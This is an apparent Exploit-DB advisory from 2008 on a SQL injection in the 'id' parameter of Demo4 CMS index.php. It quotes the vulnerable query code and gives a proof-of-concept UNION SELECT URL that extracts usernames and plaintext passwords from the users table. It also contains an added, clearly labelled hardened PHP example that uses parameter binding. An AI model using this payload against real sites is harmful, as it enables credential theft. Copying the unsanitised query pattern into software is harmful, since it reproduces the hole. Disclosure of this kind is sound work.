Demo4 CMS - 'id' SQL Injection

EDB-ID: 5914
Platform: PHP
Date: 2008-06-23

===============================================================
  Demo4 CMS (index.php id) Remote SQL Injection Vulnerability
===============================================================
 
  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 23 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : Demo4 CMS 
 VERSION     : Beta01
 VENDOR      : N/A
 DOWNLOAD    : http://downloads.sourceforge.net/demo4
#####################################################

--- Remote SQL Injection ---

-----------------------------
 Vulnerable File [index.php]
-----------------------------

@Line

   8:  if ($_GET['id']=="")
   9:  $id = $startpage;
  10:  else
  11:  $id = $_GET['id'];
  12:  database_connect();
  13:  $query = "SELECT * from content
  14:         WHERE id = $id";
  15:  $error = mysql_error();
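
A hardened form of lines 8-14 above, given here as an added example that is not part of the original advisory or of the Demo4 code: the id is validated as an integer and bound as a query parameter instead of being concatenated into the SQL string. It assumes PDO with an in-memory SQLite database standing in for the application's MySQL connection; resolve_page_id(), fetch_content(), the minimum id of 1 and the sample rows are hypothetical.

```php
<?php
declare(strict_types=1);

// Added example (not Demo4 code): function names and sample rows are hypothetical.

/** Return a validated page id, falling back to $startpage when id is absent. */
function resolve_page_id(?string $raw, int $startpage): ?int
{
    if ($raw === null || $raw === '') {
        return $startpage;               // same default as lines 8-9 of index.php
    }
    // Assumption: page ids are base-10 integers >= 1; anything else is rejected.
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Fetch one row from `content` with the id bound as an integer parameter. */
function fetch_content(PDO $db, int $id): ?array
{
    $stmt = $db->prepare('SELECT * FROM content WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data: in-memory SQLite stands in for the MySQL database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE content (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO content (id, title) VALUES (1, 'Home'), (2, 'About')");

$startpage = 1;
// Constructed inputs: absent id, valid id, unknown id, and a non-integer value.
foreach ([null, '2', '99', '2 UNION SELECT 1,2'] as $raw) {
    $id = resolve_page_id($raw, $startpage);
    if ($id === null) {
        $result = 'rejected (HTTP 400)';
    } else {
        $row = fetch_content($db, $id);
        $result = $row === null ? 'not found (HTTP 404)' : $row['title'];
    }
    printf("%-22s => %s\n", var_export($raw, true), $result);
}
```

Validation and parameter binding are independent layers: the bound parameter alone keeps the value out of the SQL text, and the integer check lets the application answer malformed ids with a client error before the database is touched.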

---------
 Exploit
---------

[+] http://[Target]/[demo4_path]/index.php?id=[SQL Injection]


   **This exploit can get the username and password (no encryption)**

-------------
 POC Exploit
-------------

[+] http://192.168.24.25/demo4/index.php?id=-9999/**/UNION/**/SELECT/**/1,userid,3,4,password,username,7,8/**/FROM/**/pages_t_users


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-23]